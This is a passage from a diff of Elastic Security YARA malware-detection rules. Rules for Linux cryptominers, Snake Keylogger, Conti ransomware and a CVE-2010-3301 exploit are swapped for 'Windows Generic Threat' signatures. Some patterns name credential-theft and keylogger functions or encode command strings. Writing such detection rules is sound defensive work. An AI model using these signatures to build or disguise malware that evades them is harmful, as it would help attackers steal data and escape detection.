C0 05 8A 10 3A 11 75 18 84 D2 74 EC } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_Fe7139E5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_F0516E98 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "fe7139e5-3c8e-422c-aaf7-e683369d23d4" - date = "2021-01-12" - modified = "2021-09-16" + id = "f0516e98-57e1-4e88-b49d-afeff21f6915" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L200-L218" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8b13dc59db58b6c4cd51abf9c1d6f350fa2cb0dbb44b387d3e171eacc82a04de" - logic_hash = "d1ef74f2a74950845091b2ebc2f7fd05980bcbd2aea4fdd9549c54cec1768501" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2375-L2394" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "21d01bd53f43aa54f22786d7776c7bc90320ec6f7a6501b168790be46ff69632" + logic_hash = "28f5b1a05d90745f432aee6bb9da3855d70b18d556153059794c5e53bbd5117c" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "4af38ca3ec66ca86190e6196a9a4ba81a0a2b77f88695957137f6cda8fafdec9" - severity = 100 + fingerprint = "c43698c42411080f4df41f0f92948bc5d545f46a060169ee059bb47efefa978c" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FF 74 5B 48 29 F9 49 89 DC 4C 8D 69 01 49 D1 ED 4C 01 E9 4D 8D 6C } + $a1 = { 69 66 20 65 78 69 73 74 20 25 73 20 67 6F 74 6F 20 3A 72 65 70 65 61 74 } + $a2 = { 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 5F } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_F35A670C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_3C4D9Cbe : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "f35a670c-7599-4c93-b08b-463c4a93808a" - date = "2021-01-12" - modified = "2021-09-16" + id = "3c4d9cbe-700f-4f3e-8e66-d931d5c90d3e" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L220-L238" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a73808211ba00b92f8d0027831b3aa74db15f068c53dd7f20fcadb294224f480" - logic_hash = "95a8aeffb7193c3f4adfea5b7f0741a53528620c57cbdb4d471d756db03c6493" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2396-L2414" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "21d01bd53f43aa54f22786d7776c7bc90320ec6f7a6501b168790be46ff69632" + logic_hash = "b32f9a3b86c60d4d69c59250ac59e93aee70ede890b059b13be999adbe043d2c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9064024118d30d89bdc093d5372a0d9fefd43eb1ac6359dbedcf3b73ba93f312" - severity = 100 + fingerprint = "15be51c438b7b2a167e61e35821445404a38c2f8c3e037061a1eba4bf0ded2b5" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4C 01 CD 48 0F AF D6 48 8D 54 55 00 89 DD 48 31 D7 48 C1 C7 20 } + $a1 = { 55 8B EC 53 56 57 8B 55 08 8B DA 8B 7A 3C 03 FA 66 81 3F 50 45 75 54 03 5F 78 8B 4B 18 8B 73 20 8B 7B 24 03 F2 03 FA FC 55 8B 6D 0C AD 03 C2 96 87 FD 51 33 C9 80 C1 0F F3 A6 72 0C 96 59 87 FD } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_70E5946E : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Deb82E8C : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "70e5946e-3e73-4b07-9e7d-af036a3242f9" - date = "2021-01-12" - modified = "2021-09-16" + id = "deb82e8c-57dc-47ea-a786-b4e1ae41a40f" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L240-L258" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" - logic_hash = "324deafee2b14c125100e49b90ea95bc1fc55020a7e81a69c7730a57430560f4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2416-L2435" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0f5791588a9898a3db29326785d31b52b524c3097370f6aa28564473d353cd38" + logic_hash = "c24baecab39c72f6bb30713022297cb9fb41ef5339a353702f3f780a630d5b27" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "ced6885fda17c862753232fde3e7e8797f5a900ebab7570b78aa7138a0068eb9" - severity = 100 + fingerprint = "3429ecf8f509c6833b790156e61f0d1a6e0dc259d4891d6150a99b5cb3f0f26e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4F 70 48 8D B4 24 B0 00 00 00 48 89 34 CA 49 8B 57 68 48 89 C8 83 } + $a1 = { 50 6F 76 65 72 74 79 20 69 73 20 74 68 65 20 70 61 72 65 6E 74 20 6F 66 20 63 72 69 6D 65 2E } + $a2 = { 2D 20 53 79 73 74 65 6D 4C 61 79 6F 75 74 20 25 64 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_033F06Dd : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_278C589E : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "033f06dd-f3ed-4140-bbff-138ed2d8378c" - date = "2021-01-12" - modified = "2021-09-16" + id = "278c589e-fca0-4228-8ffa-6b5e4627b1b1" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L260-L278" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3afc8d2d85aca61108d21f82355ad813eba7a189e81dde263d318988c5ea50bd" - logic_hash = "a0c788dbcd43cab2af1614d5d90ed9e07a45b547241f729e09709d2a1ec24e60" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2437-L2455" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cccc6c1bf15a7d5725981de950475e272c277bc3b9d266c5debf0fc698770355" + logic_hash = "59bbbecd73541750f7221b12895ccf51e1a6863ceca62e23f541df904ad23587" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "2f1f39e10df0ca6c133237b6d92afcb8a9c23de511120e8860c1e6ed571252ed" - severity = 100 + fingerprint = "573b6c5400400b167edd94e12332d421a32dc52138a2a933f2fa85f8409c8e4a" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 42 68 63 33 4E 33 5A 48 78 6A 64 58 51 67 4C 57 51 36 49 43 31 } + $a1 = { 49 6E 73 74 61 6C 6C 65 72 20 77 69 6C 6C 20 6E 6F 77 20 64 6F 77 6E 6C 6F 61 64 20 66 69 6C 65 73 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 69 6E 73 74 61 6C 6C 61 74 69 6F 6E 2E } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_Ce0C185F : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_6B621667 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ce0c185f-fca2-47d3-9e7c-57b541af98a5" - date = "2021-01-12" - modified = "2021-09-16" + id = "6b621667-8ed2-4a6e-9fad-fc7a01012859" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L280-L298" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cdd3d567fbcbdd6799afad241ae29acbe4ab549445e5c4fc0678d16e75b40dfa" - logic_hash = "f88c5a295cc62f5a91e26731fc60aaf450376cbb282f43304ba2a5ac5d149dd4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2457-L2475" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b50b39e460ecd7633a42f0856359088de20512c932fc35af6531ff48c9fa638a" + logic_hash = "3574b7ef24c4387a9919ed9831af7657047b26d8922ab78788619bbd3d0edd56" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0d2e3e2b04e93f25c500677482e15d92408cb1da2a5e3c5a13dc71e52d140f85" - severity = 100 + fingerprint = "77d3637fea6d1ddca7b6943671f2d776fa939b063d60d8b659a0fc63acfdc869" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { EF E5 66 0F 6F AC 24 80 00 00 00 66 0F EB E8 66 0F EF D5 66 0F } + $a1 = { 55 8B EC 51 64 A1 30 00 00 00 56 33 F6 89 75 FC 8B 40 10 39 70 08 7C 0F 8D 45 FC 50 E8 8F 0D 00 00 83 7D FC 01 74 03 33 F6 46 8B C6 5E C9 C3 8B FF 55 8B EC 51 51 53 56 6A 38 6A 40 E8 32 EB FF } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_Da08E491 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C374Cd85 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "da08e491-c6fa-4228-8b6a-8adae2f0324a" - date = "2021-01-12" - modified = "2021-09-16" + id = "c374cd85-714b-47c5-8645-cc7918fa2ff1" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L300-L318" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4638d9ece32cd1385121146378772d487666548066aecd7e40c3ba5231f54cc0" - logic_hash = "f98252c33f8d76981bbc51de87a11a7edca7292a864fc2a305d29cd21961729e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2477-L2495" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1c677585a8b724332849c411ffe2563b2b753fd6699c210f0720352f52a6ab72" + logic_hash = "8e183f780400f3bf9840798d53b431a4bf28bc43e07d69a3d614217e02f5dd79" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c4911fdeece4c3f97bbc9ef4da478c5f5363ab71a70b0767edec0f94b87fd939" - severity = 100 + fingerprint = "4936566b7f3f8250b068aa8e4a9b745c3e9ce2fa35164a94e77b31068d3d6ebf" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F9 48 31 CD 48 89 F9 48 F7 D1 4C 21 F9 48 21 DA 49 31 CA 48 } + $a1 = { 83 EC 0C 53 8B 5E 74 39 9E 44 01 00 00 75 07 33 C0 E9 88 00 00 00 57 8B BE E0 00 00 00 85 FF 74 79 8B 8E E4 00 00 00 85 C9 74 6F 8B 86 44 01 00 00 8B D0 03 C7 8D 4C 01 F8 2B D3 89 4D } condition: all of them } -rule ELASTIC_Windows_Trojan_Snakekeylogger_Af3Faa65 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7693D7Fd : FILE MEMORY { meta: - description = "Detects Windows Trojan Snakekeylogger (Windows.Trojan.SnakeKeylogger)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "af3faa65-b19d-4267-ac02-1a3b50cdc700" - date = "2021-04-06" - modified = "2021-08-23" + id = "7693d7fd-4161-4afb-8a8d-d487f2a7de5e" + date = "2024-02-13" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SnakeKeylogger.yar#L1-L32" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "54180a642d40b5366f1b400c347c25dc31397d662d6bb8af33c7d2319c97d3fb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2497-L2515" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc40cc5d0bd3722126302f74ace414e6934eca3a8a5c63a11feada2130b34b89" + logic_hash = "886ad084f33faf8baae8a650a88095757c2cff9e18c8f5c50ff36120b43ec082" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d" - severity = 100 + fingerprint = "92489c8eb4f8a9da5e7bd858a47e20b342d70df1ba3a4769df06c434dc83d138" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "get_encryptedPassword" ascii fullword - $a2 = "get_encryptedUsername" ascii fullword - $a3 = "get_timePasswordChanged" ascii fullword - $a4 = "get_passwordField" ascii fullword - $a5 = "set_encryptedPassword" ascii fullword - $a6 = "get_passwords" ascii fullword - $a7 = "get_logins" ascii fullword - $a8 = "GetOutlookPasswords" ascii fullword - $a9 = "StartKeylogger" ascii fullword - $a10 = "KeyLoggerEventArgs" ascii fullword - $a11 = "KeyLoggerEventArgsEventHandler" ascii fullword - $a12 = "GetDataPassword" ascii fullword - $a13 = "_encryptedPassword" ascii fullword - $b1 = "----------------S--------N--------A--------K--------E----------------" - $c1 = "SNAKE-KEYLOGGER" ascii fullword + $a1 = { 55 8B EC 51 51 8B 45 08 83 65 FC 00 8B 00 0F B7 48 14 66 83 78 06 00 8D 4C 01 18 0F 86 9A 00 00 00 53 56 57 8D 59 24 8B 13 8B CA 8B F2 C1 E9 1D C1 EE 1E 8B FA 83 E1 01 83 E6 01 C1 EF 1F F7 C2 } condition: - 8 of ($a*) or #b1>5 or #c1>5 + all of them } -rule ELASTIC_Windows_Ransomware_Conti_89F3F6Fa : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Df5De012 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Conti (Windows.Ransomware.Conti)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "89f3f6fa-492c-40e3-a4aa-a526004197b2" - date = "2021-08-05" - modified = "2021-10-04" + id = "df5de012-52b6-4558-a00b-2dbf052e34d3" + date = "2024-02-14" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Conti.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe" - logic_hash = "4c1834e45d5e42f466249b75a89561ce1e88b9e3c07070e2833d4897fbed22ee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2517-L2535" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "13c06d7b030a46c6bb6351f40184af9fafaf4c67b6a2627a45925dd17501d659" + logic_hash = "1a1ce3644c33a4591ab6582525366d47e07bdc2350aa6066ec5b5fedc605b037" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "a82331eba3cbd52deb4bed5e11035ac1e519ec27931507f582f2985865c0fb1a" - severity = 100 + fingerprint = "ee293cda37e0f1c76f89a7d1e074c9591950299b2ae87cca11c6cf7fbfee1fc4" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { F7 FE 88 57 FF 83 EB 01 75 DA 8B 45 FC 5F 5B 40 5E 8B E5 5D C3 8D } + $a1 = { 20 2C 3F 2C 2F 2C 37 2C 27 2C 3B 2C 2B 2C 33 2C 23 2C 3D 2C 2D 2C 35 2C 25 2C 39 2C 29 2C 31 2C 21 2C 3E 2C 2E 2C 36 2C 26 2C 3A 2C 2A 2C 32 2C 22 2C 3C 2C 2C 2C 34 2C 24 2C 38 2C 28 2C 30 2C 20 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Ksmdbot_Ebeedb3C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_0E8530F5 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Ksmdbot (Linux.Cryptominer.Ksmdbot)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ebeedb3c-adc3-4df8-a8bf-5120802fa3c2" - date = "2022-12-14" - modified = "2024-02-13" + id = "0e8530f5-32ce-48a2-9413-5a8f4596ba12" + date = "2024-02-14" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Ksmdbot.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b927e0fe58219305d86df8b3e44493a7c854a6ea4f76d1ebe531a7bfd4365b54" - logic_hash = "67f97cc4f2886ed296b5b3827dc1d1792136ba8d9d27c20b677c9467618c879d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2537-L2556" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9f44d9acf79ed4450195223a9da185c0b0e8a8ea661d365a3ddea38f2732e2b8" + logic_hash = "f4a010366625c059151d3e704f6ece1808f367401729feaf6cc423cf4d5c5c60" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "c6b678a94e45441ef960bc7119e2b9742ce8aab7e463897bf4a14aa0c57d507c" - severity = 100 + fingerprint = "33007c3793c74aaac45434cbd0b524973073a7223d68fae8da5cbd7296120739" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 48 BA 74 63 70 66 69 76 65 6D 4? 8B ?? 24 } - $a2 = { 48 B9 FF FF FF FF 67 65 74 73 48 89 08 48 B9 65 74 73 74 61 74 75 73 48 89 48 } - $a3 = { 48 B? 73 74 61 72 74 6D 69 6E 49 39 ?3 } - $a4 = { 48 BA 6C 6F 61 64 63 6C 69 65 48 8B B4 24 } - $a5 = { 48 BA 73 74 6? 7? 7? 6? 6? 6E 49 39 13 } + $a1 = { 63 6D 64 20 2F 63 20 73 74 61 72 74 20 22 22 20 22 25 53 25 53 22 20 25 53 } + $a2 = { 76 68 61 50 20 71 20 65 71 30 75 61 } condition: - 3 of them + all of them } -rule ELASTIC_Linux_Exploit_CVE_2010_3301_79D52Efd : FILE MEMORY CVE_2010_3301 +rule ELASTIC_Windows_Generic_Threat_Ba807E3E : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2010 3301 (Linux.Exploit.CVE-2010-3301)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "79d52efd-7955-4aa3-afbe-b7d172c30f34" - date = "2021-04-06" - modified = "2021-09-16" + id = "ba807e3e-13d8-49e0-ad99-32994d490e8b" + date = "2024-02-14" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2010_3301.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "53a2163ad17a414d9db95f5287d9981c9410e7eaeea096610ba622eb763a6970" - logic_hash = "1d4eb14042f552aa1577d0fe452e92c25bda66d0ad1a66e824677bee65908578" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2558-L2576" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cabd0633b37e6465ece334195ff4cc5c3f44cfe46211165efc07f4073aed1049" + logic_hash = "896eedb949eec6dff3e867ae3179b741382dd25ba06c6db452ac1ae5bc6bc757" score = 75 - quality = 75 - tags = "FILE, MEMORY, CVE-2010-3301" - fingerprint = "22235427bc621e07c16c365ddbf22a4e1c04d7a0f23c3e4c46d967d908256567" - severity = 100 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "e6ea7577f8f21e778d21b4651bf55e66ec53fb6d80d68f2ab344261be50d03cc" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 3B F9 FF FF 83 7D D4 FF 75 16 48 8D 3D 35 03 } + $a1 = { 7D 4A 36 35 2B 7E 2E 2C 2F 37 2C 3D 31 7E 3B 3D 30 30 2F 2A 7E 3C 39 7E 2C 29 30 7E 35 30 7E 5A 4F 4B 7E 31 2F 3A 39 70 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2010_3301_D0Eb0924 : FILE MEMORY CVE_2010_3301 +rule ELASTIC_Windows_Generic_Threat_4578Ee8C : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2010 3301 (Linux.Exploit.CVE-2010-3301)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "d0eb0924-dae1-46f9-a4d0-c9e69f781a22" - date = "2021-04-06" - modified = "2021-09-16" + id = "4578ee8c-9dfc-4fb2-b5dc-8f55b6ee26d0" + date = "2024-02-14" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2010_3301.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "907995e90a80d3ace862f2ffdf13fd361762b5acc5397e14135d85ca6a61619b" - logic_hash = "5229be3d1997ee4d05846d6804ffafd36c088dd8607a1fba39a0a43950e448c1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2578-L2596" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "699fecdb0bf27994d67492dc480f4ba1320acdd75e5881afbc5f73c982453fed" + logic_hash = "1a519bb84aae29057536ea09e53ff97cfe34a70c84ac6fa7d1ec173de3754f03" score = 75 - quality = 75 - tags = "FILE, MEMORY, CVE-2010-3301" - fingerprint = "bb288a990938aa21aba087a0400d6f4765a622f8ed36d1dd7953d09cbb09ff83" - severity = 100 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "3a40e6e8f35c5c114b1b0175723d9403c357bba7170c4350194d40d4a2c94c61" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 3C FA FF FF 83 7D EC FF 75 19 BF 20 13 40 00 } + $a1 = { 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 25 64 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 25 64 2E 31 3B 20 53 56 31 29 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2010_3301_A5828970 : FILE MEMORY CVE_2010_3301 +rule ELASTIC_Windows_Generic_Threat_Ebf62328 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2010 3301 (Linux.Exploit.CVE-2010-3301)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "a5828970-7a30-421c-be92-5659c18b88d1" - date = "2021-04-06" - modified = "2021-09-16" + id = "ebf62328-f069-43f2-b943-6ddf64f04fb2" + date = "2024-02-14" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2010_3301.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4fc781f765a65b714ec27080f25c03f20e06830216506e06325240068ba62d83" - logic_hash = "61b0cb38a6e14efee157547e811450d2ed4674f79ac86656a8d984084f71a665" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2598-L2618" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dfce19aa2e1a3e983c3bfb2e4bbd7617b96d57602d7a6da6fee7b282e354c9e1" + logic_hash = "e99b56dde761c5efad14f935befa4d1dbb31cd305b5d6af05a90d44dc3cd0098" score = 75 - quality = 75 - tags = "FILE, MEMORY, CVE-2010-3301" - fingerprint = "72223f502b2a129380ab011b785f6589986d2eb177580339755d12840617ce5f" - severity = 100 + quality = 69 + tags = "FILE, MEMORY" + fingerprint = "44cce86a986cbb051f1b94c2d5b54830cbe7de1f3387e207bd6b267a5166bbe7" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 7C FC FF FF 83 7D EC FF 75 19 BF 40 0E 40 00 } + $a1 = { 74 52 75 50 5B 5D 5F 5E 41 5C 41 5D 41 5E } + $a2 = { 5F 5E 41 5C 41 5E 41 5F 74 7A 75 78 } + $a3 = { 44 64 71 52 71 77 7C 61 